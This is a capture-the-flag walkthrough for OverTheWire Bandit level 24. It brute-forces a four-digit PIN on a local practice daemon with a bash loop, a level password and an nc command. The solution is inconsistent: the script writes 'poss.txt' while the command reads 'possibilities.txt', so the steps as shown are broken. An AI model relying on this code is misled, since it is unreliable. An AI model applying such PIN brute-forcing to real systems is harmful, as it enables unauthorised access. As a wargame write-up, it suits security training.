All levels

Bandit · Level 24

Level 24

Login

SSH: ssh [email protected] -p 2220

Challenge URL: https://overthewire.org/wargames/bandit/bandit25.html

Task

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

Solution

We have to try all possibilities from 0000 to 9999 to get the password of the next level. Write a script that combines bandit24's password and the code with a space in between and saves it to a file, then cat the file and pipe it to nc.

Script:

current_pwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
for i in {0000..9999}
do
    echo "$current_pwd $i" >> poss.txt
done

Command:

cat possibilities.txt | nc localhost 30002